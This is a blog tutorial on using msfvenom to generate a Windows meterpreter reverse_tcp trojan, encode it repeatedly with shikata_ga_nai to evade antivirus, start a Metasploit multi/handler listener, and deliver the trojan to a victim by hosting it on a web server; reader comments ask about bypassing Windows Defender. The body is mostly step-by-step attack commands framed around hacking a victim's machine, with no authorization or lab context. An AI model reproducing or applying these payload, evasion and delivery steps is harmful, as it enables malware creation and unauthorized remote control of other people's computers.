Mastering MSFvenom: A Comprehensive Guide to Exploitation

MSFvenom replacement of MSFpayload and msfencode image

Hello and welcome to my blog, I am reaching you with a latest and most knowledgeable post. As you know msfpayload was used to create payloads (generally called trojan /backdoor ) and msfencode was used to encode payloads for avoiding antivirus detection. you can read in my old post Creating Trojan Horse (Encoded)By Using Msfpayload but both of them msfpayload and msfencode have been removed from the metasploit framework on June 8th 2015.

So what is now?

Answer is msfvenom

In this article, I will cover what is msfvenom, use of msfvenom, generate and encode payload by msfvenom, avoid bad characters by msfvenom, start multi handler server to listen to trojan backdoor.

What is msfvenom?

In simple word “msfvenom is a combination of msfpayload and msfencode. it is used to generate payloads and encode them as well.” Now you don’t need to run two different commands to create a payload and encode it. msfvenom comes default in Metasploit, so you don’t need to install an extra package in your system for more detail about Metasploit for Tutorial you read my metasploit guide section.

Metasploit command line interface msfconsole and GUI Armitage are preinstalled in Kali Linux’s current version Kali 2016.2. I will describe the tutorial using Kali Linux.

Let’s start using MSFvenom

In Kali Linux, right-click on the desktop desktop then click on the open terminal. A new terminal window will be open type the following command

#msfvenom -h

How to generate a payload using MSFvenom

To generate a payload there are two switches that must be used -p and -f. -p for payload and -f for output file format. You should know first which payload you are going to use. To print the available list of payloads use -l

#msfvenom -l payloads

After selecting the appropriate payload. Use the following code

#msfvenom -p <payload> -f <file format>

To know more about formats use the following code

#msfvenom –help-formats

#msfvenom -p windows/meterpreter/reverse_tcp -f exe > PATH

The final code would be

#msfvenom -p windows/meterpreter/reverse_tcp -f exe > /root/Desktop/trojan.exe

Before executing the final code you should know about payload options to be used. You can see in the above code payload is for giving the connection back to the attacker. But it will not send back a connection to the attacker, reason, in this code options are not specified yet. So you must know about available options for windows/meterpreter/reverse_tcp. Go through the following code

#msfvenom –payload-options -p <payload >

Now the code is

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker IP] LPORT=[desired port] -f exe > root/Desktop/trojan.exe

#msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > root/Desktop/trojan.exe

It’s good news that your payload is ready, you can send this payload to the victim’s machine and when the victim will execute this file he will be hacked. But this payload is well known and most antivirus are aware of it. Antivirus will detect easily this code and will remove it. So what is next?

You can do the following things;

  1. Avoid  the bad character
  2. Encode the payload
  3. Iterations

How to avoid bad characters from the payloads by using msfvenom

As you have seen in the help menu of msfvenom, the -b flag is to be used to avoid certain bad characters from the payload. When the -b switch is used, msfvenom find a good encoder to encode the payload and avoid bad character automatically

Msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -b ‘/x00’ -f exe > root/Desktop/trojan.exe

How to encode a payload by msfvenom

When you will use -b flag, the payload will be encoded automatically with a good encoder. But if you still want to use a specific encoder then you can use -e [encoder name] code. You can use only the available encoder with msfvenom. So first use the following code to know about available encoder

Msfvenom -l encoder

Your final code will be

#msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -f exe > root/Desktop/trojan.exe


The number of times to encode the payload

#msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > root/Desktop/trojan.exe

Use architecture and platform for payload by msfvenom

-a <x64/x86> to be used to define architecture. and –platform for the platform but first check the available platform in Metasploit.

msfvenom –help-platforms

#msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > root/Desktop/trojan.exe

Start multi handler server on the attacker machine

Trojan will be executed on the victim’s machine and it will send a back connection to the attacker’s machine. So attacker must have a listener server on its machine. You can start multi handler server on your attacker machine by following the instruction


msf>use exploit/multi/handler

>set payload windows/meterpreter/reverse_tcp

>set LHOST [attacker IP]

>set LPORT 4444


This is a very important phase. you have created trojan.exe and started multi/handler server, Next step send it to the victim machine. I started the apache2 web server and moved trojan.exe /var/www/html. and I have forwarded port 80 to my attacker machine on the router. and I send the link http://AttackerIP/trojan.exe. The victim downloads a trojan and executes it. the session will be created

MODULE 13:- Metasploit Framework

  1. 6 Metasploit Modules – You should know
  2. MSFvenom replacement of MSFpayload and msfencode – Full guide
  3. 6 Techniques to analyze the vulnerability scan report in Metasploit
  4. How to use Metasploit for vulnerability scanning
  5. How to use metasploit pro in Kali Linux
  6. Creating Persistent Backdoor By Metasploit in Kali Linux
  7. Creating Trojan Horse (Encoded)By Using Msfpayload

If Appreciate My Work, You should consider:

6 thoughts on “Mastering MSFvenom: A Comprehensive Guide to Exploitation

  1. I tried it but anti virus even windows defender is able to detect the virus. Is there any other way to evade the detection even though there is Quick Heal Total Security?

    1. Hi Mitul,
      Your question is good, but this is well known code, so all Antivirus has its signature and they detect easily. some time encoding is work properly. if you really want to bypass AV, you should write own code or use any paid encoder.

  2. I am getting this error
    handler failed to bind (public ip) :1337
    I am using lhost as my dynamic dns host

Leave a Reply

Your email address will not be published. Required fields are marked *